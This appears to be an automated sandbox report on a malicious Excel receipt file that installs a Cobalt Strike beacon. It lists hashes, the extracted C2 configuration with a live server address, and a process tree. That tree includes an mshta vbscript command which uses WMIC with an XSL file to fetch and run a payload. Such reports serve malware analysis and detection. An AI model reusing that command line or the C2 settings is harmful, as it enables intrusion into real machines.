Analysis
- max time kernel: 148s
- max time network: 185s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 06-07-2021 15:38

Static task: static1
Behavioral task: behavioral1
Sample: Reciept 0198478.xlsb
Resource: win7v20210410
General
- Target: Reciept 0198478.xlsb
- Size: 67KB
- MD5: 16b275e48c1d27c448b4ed772206315c
- SHA1: 317988ea2f7fa8fa288850adce94bf2543bbd8d0
- SHA256: d032d57e8f366c59979f536722b5cfbded08b94fc032da27220df46dfcd43208
- SHA512: 518b238dee5d8f69ab2f09a92f7daf12613358b21bbc38247e6e9faa45470eb450815d7a094dddc0dfc8db7b4698da27e76480258c9b7feb61f0c73e1cf04c50
Malware Config
Extracted
- Family: cobaltstrike
- Watermark: 1359593325
- C2 URL: http://94.198.40.11:80/visit.js
- access_type: 512
- host: 94.198.40.11,/visit.js
- http_header1:
AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
- http_header2:
AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
- http_method1: GET
- http_method2: POST
- polling_time: 60000
- port_number: 80
- sc_process32: %windir%\syswow64\rundll32.exe
- sc_process64: %windir%\sysnative\rundll32.exe
- state_machine:
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHFcV/jTWIWbMLGsg/xD3cCk0yHN+dWUBeSAZEdvXFEiawkFkWyJWyGyT0NbgSrwHmz+krYJY6l6YOoUNPWMNc6YpuQUYrBiilMX6rDkmmqUqem2tP6G4E6nBva8DOwNu671c8iFZeK4M8s6PPnUDuEuSHchHBLc5wV6Ew7BLO5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- unknown1: 4096
- unknown2:
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
- uri: /submit.php
- user_agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
- watermark: 1359593325
Signatures
- Cobaltstrike
  Detected malicious payload which is part of Cobaltstrike.
  Processes (resource | yara_rule):
    C:\Windows\Temp\e15k9.exe | cryptone
- Blocklisted process makes network request (1 IoCs)
  Processes (flow | pid | process):
    6 | 932 | WMIC.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoCs)
  Processes (pid | process):
    1052 | e15k9.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Office loads VBA resources, possible macro or embedded object present
- Enumerates system info in registry (2 TTPs, 1 IoCs)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
- Modifies Internet Explorer settings
  Processes (description | ioc | process):
    Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | EXCEL.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | mshta.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | EXCEL.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | EXCEL.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes (pid | process):
    304 | EXCEL.EXE
- Suspicious use of AdjustPrivilegeToken (40 IoCs)
  Processes (description | pid | process): pid 932, WMIC.exe. The following token adjustments were each recorded twice (20 privileges x 2 = 40 IoCs):
    Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes (pid | process):
    304 | EXCEL.EXE (recorded 5 times)
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (source pid | target pid | source process | target process):
    1872 | 1652 | taskeng.exe | mshta.EXE (recorded 3 times)
    1652 | 932 | mshta.EXE | WMIC.exe (recorded 3 times)
    932 | 1052 | WMIC.exe | e15k9.exe (recorded 4 times)
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Reciept 0198478.xlsb"
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
- C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {E9EE2BCF-C3B6-492F-9EFA-61190C2AE8AA} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\mshta.EXE
    Command line: C:\Windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qDialogSeriesAxes.xsl"" & Chr(34)),0:close")
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\wbem\WMIC.exe
      Command line: "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qDialogSeriesAxes.xsl"
      - Blocklisted process makes network request
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Temp\e15k9.exe
        Command line: "C:\Windows\Temp\e15k9.exe"
        - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\qDialogSeriesAxes.xsl
  MD5: ed9a97566e5179a4793dad89b79f3c8b
  SHA1: 3aba6229322c12118a7999b35387045159429078
  SHA256: c6ce5cf41a799c6c427a8facae15fa9ac40eb3562132189c72e1398178c74981
  SHA512: 08f827a3bea007feae33e69f43a09cfcb08f0f636d1eab3d937203bad63d94cd9f99312f162cefb1217e115d5ae3985b6202f2b773212134c540e01fe2d071f1
- C:\Windows\Temp\e15k9.exe
  MD5: 9a2e1bb9ad6f1ccfeaa4c2c55637ae3b
  SHA1: d42d55cab8637f847efdc1a01bcd5bb2d4668b7d
  SHA256: b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6
  SHA512: c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6
- memory/304-60-0x00000000716F1000-0x00000000716F3000-memory.dmp (Filesize: 8KB)
- memory/304-61-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
- memory/304-59-0x000000002F911000-0x000000002F914000-memory.dmp (Filesize: 12KB)
- memory/932-63-0x0000000000000000-mapping.dmp
- memory/1052-68-0x00000000002C0000-0x00000000002F3000-memory.dmp (Filesize: 204KB)
- memory/1052-65-0x0000000000000000-mapping.dmp
- memory/1052-67-0x0000000075971000-0x0000000075973000-memory.dmp (Filesize: 8KB)
- memory/1052-69-0x0000000000220000-0x0000000000267000-memory.dmp (Filesize: 284KB)
- memory/1052-70-0x0000000000400000-0x0000000000453000-memory.dmp (Filesize: 332KB)
- memory/1052-71-0x0000000001D90000-0x0000000001DCD000-memory.dmp (Filesize: 244KB)
- memory/1652-62-0x0000000000000000-mapping.dmp